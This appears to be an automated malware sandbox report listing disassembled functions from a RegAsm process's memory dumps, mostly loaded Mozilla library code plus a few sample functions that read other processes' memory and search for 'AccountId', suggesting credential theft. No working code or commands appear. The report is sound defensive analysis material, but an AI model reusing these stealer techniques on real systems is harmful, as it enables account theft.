RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C523CCC), ref: 6C524157

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 4ac034d5e6cb69b7ae918e09bc3b651449e0d4c5ca804416c8bd2405373ad312
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: E9A17DB1A00215CFDB50CF68C8C065AB7F5FF88318F254599D909AF792D779E886CBA0

Function 6C512030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C533F47,?,?,?,6C533F47,6C531A70,?), ref: 6C51207F
memset.VCRUNTIME140(?,000000E5,6C533F47,?,6C533F47,6C531A70,?), ref: 6C5120DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C533F47,6C531A70,?), ref: 6C51211A
EnterCriticalSection.KERNEL32(6C59E744,?,6C533F47,6C531A70,?), ref: 6C512145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C533F47,6C531A70,?), ref: 6C5121BA
EnterCriticalSection.KERNEL32(6C59E744,?,6C533F47,6C531A70,?), ref: 6C5121E0
LeaveCriticalSection.KERNEL32(6C59E744,?,6C533F47,6C531A70,?), ref: 6C512232

Strings

MOZ_CRASH(), xrefs: 6C51227D
MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C512253, 6C512268

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 944e470d110e35c0a3e7418be2c9def849bb6a0d67b8f2814ba6f5c0bf12d90a
Instruction ID: 16e8a4cc05690ff3525159cb2b811c1d8b7714c1a4bb4ef730d52ec1969c900a
Opcode Fuzzy Hash: 944e470d110e35c0a3e7418be2c9def849bb6a0d67b8f2814ba6f5c0bf12d90a
Instruction Fuzzy Hash: C661D531F042568FEB04CF69CC8D76E76B6AF86314F264679E524A7E94D7709C00C781

Function 6C569D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C568273), ref: 6C569D65
free.MOZGLUE(6C568273,?), ref: 6C569D7C
free.MOZGLUE(?,?), ref: 6C569D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C569E0F
free.MOZGLUE(6C56946B,?,?), ref: 6C569E24
free.MOZGLUE(?,?,?), ref: 6C569E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C569EC8
free.MOZGLUE(6C56946B,?,?,?), ref: 6C569EDF
free.MOZGLUE(?,?,?,?), ref: 6C569EF5

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 477a78dfb31632d46711d3cb59fe419771e59ead9d4987672849dc6911b048bb
Instruction ID: 3d22611be442a40f1840a5b3d44162a60b1cee3057817e4f11f2738734faad3f
Opcode Fuzzy Hash: 477a78dfb31632d46711d3cb59fe419771e59ead9d4987672849dc6911b048bb
Instruction Fuzzy Hash: A2718EB0909B41CBD712CF19C84055AF3F5FF99325B44A659E89A9BB11EB30EC85CB81

Function 6C56DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C56DDCF

Part of subcall function 6C54FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C54FA4B

Part of subcall function 6C5690E0: free.MOZGLUE(?,00000000,?,?,6C56DEDB), ref: 6C5690FF
Part of subcall function 6C5690E0: free.MOZGLUE(?,00000000,?,?,6C56DEDB), ref: 6C569108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C56DE0D
free.MOZGLUE(00000000), ref: 6C56DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C56DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C56DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C56DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C55DEFD,?,6C524A68), ref: 6C56DF32

Part of subcall function 6C56DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C56DB86
Part of subcall function 6C56DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C56DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C55DEFD,?,6C524A68), ref: 6C56DF65
free.MOZGLUE(?), ref: 6C56DF80

Part of subcall function 6C535E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C535EDB
Part of subcall function 6C535E90: memset.VCRUNTIME140(ewWl,000000E5,?), ref: 6C535F27
Part of subcall function 6C535E90: LeaveCriticalSection.KERNEL32(?), ref: 6C535FB2

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 519ce1496df11c2d68294e844f44ffc9bb18c0fe498f9733c0275149cfcb5560
Instruction ID: 73e85210d79fc936cfa4cf579eeba4c1ebab9b98c26cb5f0d3f8e60ee7b64127
Opcode Fuzzy Hash: 519ce1496df11c2d68294e844f44ffc9bb18c0fe498f9733c0275149cfcb5560
Instruction Fuzzy Hash: 8351C5766016109BD7109F2ACC806AEB372BFD1308FA6091CD95A53F20EB31FD19CB82

Function 6C575D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575DC9
std::_Facet_Register.LIBCPMT ref: 6C575DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C575C8C,?,6C54E829), ref: 6C575E45

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: eaa50a88b8f7d26a890f726305e65f4b97cea1bf02ba7f20fc463608c8f23cd8
Instruction ID: 4705cc42b84ccef742c60c61c1ff771c14ac2ccec44e038303b3fd4bf9521cf5
Opcode Fuzzy Hash: eaa50a88b8f7d26a890f726305e65f4b97cea1bf02ba7f20fc463608c8f23cd8
Instruction Fuzzy Hash: 50417F707003048FDB20EF65CC98AAE77B5EF89314F5640A9E90A9B791EB30AD45CB65

Function 6C54CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C5131A7), ref: 6C54CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C54CFA4, 6C54CFB8
<jemalloc>, xrefs: 6C54CF9F, 6C54CFB3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: eeeb5277f4d7868ed6111092b4c015a8dfa6c20ba639aa878bfea1660b07b363
Instruction ID: 1b4fe20c82c0e0b426ec501fbdbaa4ab3a08087182735eeaf6f7dcded6b9cf99
Opcode Fuzzy Hash: eeeb5277f4d7868ed6111092b4c015a8dfa6c20ba639aa878bfea1660b07b363
Instruction Fuzzy Hash: 9231D6307402556BFF11BF658C45F6E7BB5BBC1B58F218055F611ABA80DB70E808C795

Function 6C51BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C51BC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C51BD06

Strings

0, xrefs: 6C51BBCD
y, xrefs: 6C51BC4E
0, xrefs: 6C51BC74

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 445d773a54200fda5af8d824c31e506c25776270a23240f27ab738454d461dad
Instruction ID: d920ee25ea8d76424c84bc1711b2201312a38a39c29016122342f118723cc3e2
Opcode Fuzzy Hash: 445d773a54200fda5af8d824c31e506c25776270a23240f27ab738454d461dad
Instruction Fuzzy Hash: 6C61C2B1A0C3458FD714EF38C884A5BB7E5AFD9348F004A2DF88597B51EB30DA498782

Function 6C51ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C51F100: LoadLibraryW.KERNEL32(shell32,?,6C58D020), ref: 6C51F122
Part of subcall function 6C51F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C51F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C51ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C51EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C51EDCC
CreateFileW.KERNEL32 ref: 6C51EE08
free.MOZGLUE(00000000), ref: 6C51EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C51EE32

Part of subcall function 6C51EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C51EBB5
Part of subcall function 6C51EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C54D7F3), ref: 6C51EBC3
Part of subcall function 6C51EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C54D7F3), ref: 6C51EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C51EDC1

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: e16595d02f604a62cdffaa2e50266af410d520d29a7f4301642719fdb1a3ccda
Instruction ID: 6c29ae5e1e859af95776b1071572929aaab4d091deb40d17e5f787e9ebf6085f
Opcode Fuzzy Hash: e16595d02f604a62cdffaa2e50266af410d520d29a7f4301642719fdb1a3ccda
Instruction Fuzzy Hash: C651B271D09254CBEB00DF68CC496AEB7B0AF99318F45891DE8556BF80E7B06D48C7E2

Function 6C520A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6C57B80C,00000000,?,?,6C52003B,?), ref: 6C520A72

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

moz_xmalloc.MOZGLUE(?,?,6C57B80C,00000000,?,?,6C52003B,?), ref: 6C520AF5
free.MOZGLUE(00000000,?,?,6C57B80C,00000000,?,?,6C52003B,?), ref: 6C520B9F
free.MOZGLUE(?,?,?,6C57B80C,00000000,?,?,6C52003B,?), ref: 6C520BDB
free.MOZGLUE(00000000,?,?,6C57B80C,00000000,?,?,6C52003B,?), ref: 6C520BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6C57B80C,00000000,?,?,6C52003B,?), ref: 6C520C0A

Strings

alloc overflow, xrefs: 6C520C05

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: a982eaa410f0e999f5ae9e2a5e5f6453389692e59fb3e40fa38e4421ab12b115
Instruction ID: f34e3b7c53db5644f03b2ff7bac2654da216feb5181a381bacdcc79a37bb9460
Opcode Fuzzy Hash: a982eaa410f0e999f5ae9e2a5e5f6453389692e59fb3e40fa38e4421ab12b115
Instruction Fuzzy Hash: F151CEB1A05246CFDB24CF18CCE0A6EB3F5EF84308F54496EC80A9BA81EB75A544CB51

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 6C58A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C58A565

Part of subcall function 6C58A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58A4BE
Part of subcall function 6C58A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C58A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C58A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C58A6B6

Strings

z, xrefs: 6C58A6AE
0, xrefs: 6C58A5FB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 8cfd09b7d2beaf7fe14c9c9864425710ec2904b8014c48d5a15c4a49f73104e4
Instruction ID: 96daa2be08e818aa13f48f9a3c8f5888b8733e711aa921267004f1b4e8640b66
Opcode Fuzzy Hash: 8cfd09b7d2beaf7fe14c9c9864425710ec2904b8014c48d5a15c4a49f73104e4
Instruction Fuzzy Hash: 824148719097459FC341DF29C880A8FBBE5BFC9344F408A2EF49987694E730D549CB82

Function 6C5178C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C59008B), ref: 6C517B89
free.MOZGLUE(?,6C59008B), ref: 6C517BAC

Part of subcall function 6C5178C0: free.MOZGLUE(?,6C59008B), ref: 6C517BCF

free.MOZGLUE(?,6C59008B), ref: 6C517BF2

Part of subcall function 6C535E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C535EDB
Part of subcall function 6C535E90: memset.VCRUNTIME140(ewWl,000000E5,?), ref: 6C535F27
Part of subcall function 6C535E90: LeaveCriticalSection.KERNEL32(?), ref: 6C535FB2

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 0b0e39f256562065dbf57ba5bc4287387974d3957333ec9a78481361e8b6c815
Instruction ID: acc322beb2bb25e6a180b548a35df9ec4901836b6093dd250ae5f5a35b58ee78
Opcode Fuzzy Hash: 0b0e39f256562065dbf57ba5bc4287387974d3957333ec9a78481361e8b6c815
Instruction Fuzzy Hash: 23C1A271E091288BFB24CB2CCC98B9DB772AF81358F1546E9D41AA7FC0D7319E858B51

Function 6C559420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
__Init_thread_footer.LIBCMT ref: 6C55949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C559459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C55947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C55946B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: c40834e549e9654fa6257e35b3f2de924fac6c37b0d2bac8e3af1346f6b39183
Instruction ID: 520bf6d10ca96798c8743e1cbfa1cb1a68c941d09cef42f2b33435e12424c662
Opcode Fuzzy Hash: c40834e549e9654fa6257e35b3f2de924fac6c37b0d2bac8e3af1346f6b39183
Instruction Fuzzy Hash: E50175B0A00181C7DA009F5CDC15A8E337AAB45329F1746B7E90A86A51D725EC768A9F

Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409BB2

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
lstrlenA.KERNEL32(?), ref: 00409C7E
lstrlenA.KERNEL32(?), ref: 00409C99

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

